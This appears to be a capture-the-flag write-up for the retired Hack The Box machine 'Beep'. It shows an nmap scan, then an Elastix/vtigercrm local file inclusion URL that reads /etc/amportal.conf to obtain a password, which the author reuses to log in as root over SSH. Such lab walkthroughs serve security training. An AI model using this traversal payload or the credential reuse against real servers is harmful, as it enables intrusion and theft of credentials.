Beep

Name: Beep
Release Date: 15 Mar 2017
Retire Date: 16 Oct 2017
OS: Linux
Base Points: Easy - Retired [0]
Rated Difficulty:
Radar Graph:
rkmylo 23 days, 20 hours, 30 mins, 10 seconds
rkmylo 23 days, 20 hours, 30 mins, 24 seconds
Creator: ch4p
CherryTree File: CherryTree - Remove the .txt extension

Start with nmap -sC -sV -oA ./beep 10.10.10.7 as always

 
$  nmap -sC -sV -oA ./beep 10.10.10.7
  Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-29 15:05 EDT
  Nmap scan report for 10.10.10.7
  Host is up (0.069s latency).
  Not shown: 988 closed ports
  PORT      STATE SERVICE    VERSION
  22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
  | ssh-hostkey: 
  |   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
  |_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
  25/tcp    open  smtp       Postfix smtpd
  |_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
  80/tcp    open  http       Apache httpd 2.2.3
  |_http-server-header: Apache/2.2.3 (CentOS)                                                                                                                
  |_http-title: Did not follow redirect to https://10.10.10.7/                                                                                               
  |_https-redirect: ERROR: Script execution failed (use -d to debug)                                                                                         
  110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4                                                                                    
  |_pop3-capabilities: TOP PIPELINING UIDL STLS USER APOP IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE EXPIRE(NEVER) RESP-CODES LOGIN-DELAY(0)        
  111/tcp   open  rpcbind    2 (RPC #100000)                                                                                                                 
  143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4                                                                                    
  |_imap-capabilities: UIDPLUS NO LISTEXT Completed OK MAILBOX-REFERRALS URLAUTHA0001 LIST-SUBSCRIBED BINARY CONDSTORE IMAP4rev1 IDLE THREAD=ORDEREDSUBJECT CATENATE ACL
    QUOTA MULTIAPPEND ANNOTATEMORE UNSELECT IMAP4 THREAD=REFERENCES LITERAL+ STARTTLS ATOMIC CHILDREN NAMESPACE ID SORT=MODSEQ SORT X-NETSCAPE RENAME RIGHTS=kxte
  443/tcp   open  ssl/https?
  |_ssl-date: 2020-03-29T19:09:38+00:00; +14s from scanner time.
  993/tcp   open  ssl/imap   Cyrus imapd
  |_imap-capabilities: CAPABILITY
  995/tcp   open  pop3       Cyrus pop3d
  3306/tcp  open  mysql?
  |_mysql-info: ERROR: Script execution failed (use -d to debug)
  4445/tcp  open  upnotifyp?
  10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
  |_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
  Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

  Host script results:
  |_clock-skew: 13s

  Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  Nmap done: 1 IP address (1 host up) scanned in 364.92 seconds
 

There's a lot of services to look at on this one.  SSH, SMTP, HTTP, HTTPS, POP3, and a few non-standard ones.  SMTP, POP3, and HTTP/S are leading me to believe this is some kind of mail server.  Let's fire up Dirbuster with a medium wordlist and navigate to the HTTP site while it is running.  Doing so, presents us with an "Elastix" login page.

Checking out the source of the login page doesn't yeild anything useful.  Let's pull some Google-Fu and see what's out there for Elastix.  We eventually come across a Local File Inclusion vulnerability.  ExploitDB/Searchsploit will help you tremendously in your efforts.

Looking at the ExploitDB and Searchsploit results (https://www.exploit-db.com/exploits/37637), we locate a string to try out
https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action
We get a large txt file that, if we dig through it, has the AMPDBPASS attribute for the login portal.

So, now we can log into the web portal.  I'm not going to go into too much detail on the web interface because it is a huge rabbit hole.  Instead, I look at everything else. Just for kicks, let's see if I can SSH with that AMPDBPASS.  This will let us know if the "admin" user and the root user are using the same credentials.

It looks like they are using the same credentials.  No privesc required.  Just ssh [email protected] with the AMPDBPASS and this box is done!